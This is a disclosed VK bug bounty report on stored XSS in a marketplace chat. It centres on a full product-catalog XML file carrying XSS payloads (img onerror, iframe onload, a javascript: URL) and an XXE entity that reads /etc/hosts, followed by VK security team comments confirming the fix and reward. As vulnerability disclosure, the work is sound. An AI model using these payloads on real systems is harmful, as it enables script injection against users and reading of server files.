EN
Bug Bounty
/
Disclosed reports

XSS в чате

Заливаем товар через этот файл, оформляем покупку и в чате видим ХСС!
 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/hosts"> ]>
 <yml_catalog date="2021-04-01 12:20">
   <shop>
     <name>vk.com?'/"><img/src=x/onerror=alert();></name>
     <company>vk.com?'/"><img/src=x/onerror=alert();></company>
     <url>javascript:alert();//</url>
     <currencies>
       <currency id="RUB" rate="1"/>
     </currencies>
     <categories>
       <category id="1">&ent;</category>
       <category id="243">Стикеры кот'\"><img src=x onerror=alert();>ики</category>
       <category id="3">Стикеры пёсики</category>
     </categories>
     <offers>
       <offer id="30125845454553d941-1" available="true" group_id="3012845391">
         <price>12</price>
         <currencyId>RUB</currencyId>
         <categoryId>1</categoryId>
         <categoryId>2</categoryId>
 		<categoryId>243</categoryId>
         <name>dssddsdd1s</name>
         <description>Этfdот яркий и смелый кот dsdsdsdssdотлично дополнит любое ваше сообщение</description>
         <param name="Цвsdsddssddssdd<iframe onload=alert();>>">Цвеdsтной</param>
         <picture>https://vk.com/sticker/51635/512.png</picture>
       </offer>
     </offers>
   </shop>
 </yml_catalog>
Reward
₽60,000
VKontakte
VK
Report No.: 2266
Created: July 5, 2023, 22:31
Disclosed: March 28, 11:58
Status: Fixed
Type: Vulnerability
Severity:
High
Author:circuit
Comments
By
MrYadro
July 6, 2023
By
MrYadro
July 6, 2023
Добрый день!
Спасибо за репорт. Изучим и вернемся в ближайшее время.
С уважением, VK Security Team
By
wellenc_lex_vk
July 13, 2023
By
VK
July 24, 2023
Reward assigned: ₽60,000.00
By
4k
December 27, 2023
By
4k
December 27, 2023
Добрый день!
Поправили, пожалуйста, проверьте
С уважением,
VK Security Team
By
wellenc_lex_vk
February 6, 2024
Добрый день!
Благодарим вас за отчет и вклад в безопасность VK!

Мы ценим ваше время и желание сделать наши сервисы безопаснее.
Мы не получили от вас какой-либо новой информации об уязвимости, поэтому данный отчет закрываем, спасибо за участие в нашей Bug Bounty программе.
С уважением, VK.
By
wellenc_lex_vk
February 6, 2024